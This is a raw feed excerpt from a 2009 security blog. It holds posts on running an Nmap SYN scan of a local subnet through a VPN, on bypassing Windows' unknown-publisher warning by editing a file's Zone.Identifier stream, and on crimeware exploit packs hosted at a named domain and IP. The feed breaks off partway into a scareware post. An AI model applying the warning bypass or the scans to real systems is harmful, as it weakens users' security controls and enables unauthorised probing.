&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;adapter: The &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;system cannot find the device specified. (20)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;There are several possible reasons for this, depending on your operating system:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;LINUX: If you are getting Socket type not supported, try modprobe af_packet or &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;recompile&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;your &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;kernel with SOCK_PACKET enabled.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;*BSD: If you are getting device not configured, you need to recompile your kernel with&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Berkeley Packet &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Filter support. If you are getting No such file or directory, try creating &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;the&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;device (eg cd /dev; MAKEDEV &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;device&gt;; or use mknod).&lt;/device&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;because Microsoft &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;disabled raw sockets as of Windows XP SP2. Depending on the &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;reason &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;for this error, it is possible that the --&lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;unprivileged command-line argument will &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;help.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;SOLARIS: If you are trying to scan localhost or the address of an interface and are getting&lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;'/dev/lo0: No &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;such file or directory' or 'lo0: No DLPI device found', complain to Sun. I &lt;span class="Apple-style-span" style="white-space: pre; "&gt; &lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;don't think Solar&lt;/span&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;is can support &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;span class="Apple-style-span" style="white-space: normal; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;advanced localhost scans. You can probably use&lt;span class="Apple-style-span" style="white-space: pre; "&gt;  &lt;span class="Apple-style-span" style="white-space: normal; "&gt;"-PN -sT localhost" though.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;QUITTING!&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played "Imaginary Linux on Windows" and added the option "-e eth0" which specifies using the Ethernet device indexed at 0 and it worked like a charm.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;C:\Documents and Settings\Rafel&gt;nmap -PN -sS -p 445 -e eth0 192.168.1.*&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Interesting ports on XXXXX (192.168.0.1):&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;PORT STATE SERVICE&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;445/tcp filtered microsoft-ds&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-tab-span" style="white-space: pre; "&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1219554250805235987?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1219554250805235987/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1219554250805235987' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1219554250805235987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1219554250805235987'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/using-nmap-remotely-through-f5-firepass.html' title='Using Nmap Remotely Through F5 FirePass VPN'/><author><name>Rafel Ivgi</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='http://3.bp.blogspot.com/_18YBLFP2tdA/TPfxKzfydtI/AAAAAAAAAF0/o7KxzcR3Kx0/S220/rafel.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5598530567141511602</id><published>2009-12-10T23:27:00.002-11:00</published><updated>2009-12-10T23:29:01.472-11:00</updated><title type='text'>Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables</title><content type='html'>I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said "Honey, I am at the office, I have absolutely nothing to do and I can't connect from here to our computer at home to continue my project". I said, O.K, let's see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Me: "Honey, go to http://www.teamviewer.com, can you download it?"&lt;/div&gt;&lt;div&gt;Her: "yes, but when I run the setup.exe it says something weired like 'windows has blocked this software because it can't verify the publisher' and it won't let me install"&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;img src="http://3.bp.blogspot.com/_18YBLFP2tdA/SyIeGz93QeI/AAAAAAAAAFg/-DTZCAO2iEc/s400/cant+verify+publisher.JPG" style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 187px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5413922804430488034" /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Me: "O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start-&gt;Run. Now add ':Zone.Identifier' just before the last quotes. What do you see?"&lt;/div&gt;&lt;div&gt;Her: "I see something like ZoneId=3, now what?"&lt;br /&gt;Me: "I can't talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye"&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;After 10 minutes I get an SMS "thanks honey it worked!!!".&lt;/div&gt;&lt;div&gt;Well we found a bug, I wouldn't really call it a "Privilege Escalation" but I guess you don't have to be a hacker to bypass windows security restrictions :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5598530567141511602?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5598530567141511602/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5598530567141511602' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5598530567141511602'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5598530567141511602'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/bypassing-windows-unknown-publisher.html' title='Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables'/><author><name>Rafel Ivgi</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='http://3.bp.blogspot.com/_18YBLFP2tdA/TPfxKzfydtI/AAAAAAAAAF0/o7KxzcR3Kx0/S220/rafel.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_18YBLFP2tdA/SyIeGz93QeI/AAAAAAAAAFg/-DTZCAO2iEc/s72-c/cant+verify+publisher.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-578703671556203283</id><published>2009-12-10T03:53:00.000-11:00</published><updated>2009-12-10T03:54:34.428-11:00</updated><title type='text'>Fusion. A concept adopted by the current crimeware II</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Cada vez es más habitual que en los procesos de investigación nos encontremos con que en un mismo servidor se alojan, &amp;quot;operando&amp;quot; de forma activa, varios crimeware del tipo Exploit Pack desde los cuales controlan y administran las zombis que forman parte de su negocio fraudulento"&gt;It's increasingly common for research processes we find that on the same server are housed, "operating" actively, several &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/08/prices-of-russian-crimeware-part-2.html"&gt;crimeware Exploit Pack&lt;/a&gt; type from which control and manage the zombies that are part of his fraudulent business &lt;/span&gt;&lt;span title="."&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Hace un tiempo comentábamos sobre ZeuS y ElFiesta conviviendo en un mismo entorno, y cumpliendo los mismos objetivos."&gt;A while ago we commented on &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/06/elfiesta-recruitment-zombie-across.html"&gt;ElFiesta&lt;/a&gt; and &lt;/span&gt;&lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.offensivecomputing.net/?q=node/1421"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Hace un tiempo comentábamos sobre ZeuS y ElFiesta conviviendo en un mismo entorno, y cumpliendo los mismos objetivos."&gt;ZeuS&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Hace un tiempo comentábamos sobre ZeuS y ElFiesta conviviendo en un mismo entorno, y cumpliendo los mismos objetivos."&gt; coexisting in the same environment, and meet the same objectives.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SxqXhWOxyCI/AAAAAAAACAI/iVYctkAfHik/s1600-h/mipistus-fragus-elfiesta.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 198px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SxqXhWOxyCI/AAAAAAAACAI/iVYctkAfHik/s320/mipistus-fragus-elfiesta.png" alt="" id="BLOGGER_PHOTO_ID_5411804501398112290" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="En esta oportunidad, la fusión se encuentra entre Fragus (un crimeware cada vez más conocido) y ElFiesta."&gt;This time, the merger is between &lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/08/fragus-new-botnet-framework-in-wild.html"&gt;Fragus&lt;/a&gt; (an increasingly popular &lt;span style="font-weight: bold;"&gt;crimeware&lt;/span&gt;) and &lt;span style="font-weight: bold;"&gt;ElFiesta&lt;/span&gt;. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Ambos paquetes se encuentran alojados en el mismo servidor."&gt;Both packages are hosted on the same server. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Sin embargo, aunque cabe la posibilidad, esto no significa que estén siendo operados por el mismo botmaster."&gt;However, although the potential doesn't mean they are being operated by the same botmaster.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Sin embargo, aunque cabe la posibilidad, esto no significa que estén siendo operados por el mismo botmaster."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="El dominio en el cual se encuentran alojados es el siguiente:"&gt;The domain in which they are staying is as follows:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="El dominio en el cual se encuentran alojados es el siguiente:"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="En el caso de Fragus se encuentra en http://hotgirldream.net/far/ y en el caso de ElFiesta, se aloja en otra carpeta, la ruta es http://hotgirldream.net/content/."&gt;Where is in &lt;span style="font-weight: bold;"&gt;Fragus&lt;/span&gt; &lt;span style="font-size:85%;"&gt;&lt;span style="font-style: italic;"&gt;http://hotgirldream.net/far/&lt;/span&gt;&lt;/span&gt; and &lt;span style="font-weight: bold;"&gt;ElFiesta&lt;/span&gt; for, is hosted on another folder, the path is &lt;span style="font-size:85%;"&gt;&lt;span style="font-style: italic;"&gt;http://hotgirldream.net/content/&lt;/span&gt;&lt;/span&gt;. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Como podemos apreciar, comparten el servidor, cuya dirección IP es 210.51.166.233, localizado en Yizhuang Idc Of China Netcom, Beijing."&gt;As we can see, share the server with IP address &lt;span style="font-weight: bold;"&gt;210.51.166.233&lt;/span&gt;, located in &lt;span style="font-style: italic;"&gt;Yizhuang Idc Of China Netcom, Beijing&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Como podemos apreciar, comparten el servidor, cuya dirección IP es 210.51.166.233, localizado en Yizhuang Idc Of China Netcom, Beijing."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Esto demuestra que las oportunidades de &amp;quot;negocio&amp;quot; no pasan solamente por la venta de crimeware, malware, exploit pack y demás actividades fraudulentas, sino que otra de las alternativas es ofrecer la infraestructura que permita, en función de su capacidad computacional, optimizar los procesos"&gt;This demonstrates that opportunities for "business" don't go only by the sale of crimeware, malware, exploit pack and other fraudulent activities, but another alternative is to provide the infrastructure for, in terms of its computing capacity, streamline processes &lt;/span&gt;&lt;span title="delictivos."&gt;criminal.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span title="delictivos."&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255); font-weight: bold;" title="Información relacionada"&gt;Related information&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/fusion-un-concepto-adoptado-por-el.html"&gt;Fusión. Un concepto adoptado por el crimeware actual&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/08/fragus-new-botnet-framework-in-wild.html"&gt;Fragus. New botnet framework In-the-Wild&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.offensivecomputing.net/?q=node/1421"&gt;ZeuS and power Botnet zombie recruitment&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://malwareint.blogspot.com/2009/06/elfiesta-recruitment-zombie-across.html"&gt;ElFiesta. Recruitment zombie across multiple threa...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-578703671556203283?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/578703671556203283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=578703671556203283' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/578703671556203283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/578703671556203283'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/12/fusion-concept-adopted-by-current.html' title='Fusion. A concept adopted by the current crimeware II'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Ppq0fEGkHo4/SxqXhWOxyCI/AAAAAAAACAI/iVYctkAfHik/s72-c/mipistus-fragus-elfiesta.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2843903599536161921</id><published>2009-12-06T05:10:00.001-11:00</published><updated>2009-12-06T05:10:00.509-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rogue'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Intelligence'/><category scheme='http://www.blogger.com/atom/ns#' term='desinformation'/><category scheme='http://www.blogger.com/atom/ns#' term='scareware'/><title type='text'>Disinformation campaign to spread malware</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="La desinformación consiste básicamente en falsear o manipular la información de manera tal que quien la recibe termine creyendo en algo completamente falso, y de lo cual el originador obtiene alguna ventaja."&gt;Disinformation is basically distort or manipulate the information so that the recipient end believing something completely untrue, and which the originator obtains an advantage. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Por ejemplo, el rumor es una herramienta empleada en las campañas de desinformación."&gt;For example, the rumor is a tool used in the campaigns of disinformation. &lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A su vez, la desinformación es una herramienta que permite obtener información útil en tiempo y forma (Inteligencia)."&gt;In turn, misinformation is a tool that provides useful information in a timely manner (&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/inteligencia-informatica-seguridad-de.html"&gt;Intelligence&lt;/a&gt;).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="A su vez, la desinformación es una herramienta que permite obtener información útil en tiempo y forma (Inteligencia)."&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="long_text"&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="Trasladado este concepto al ámbito informático, no es ni más ni menos que una metodología de Ingeniería Social que cada vez más utilizan 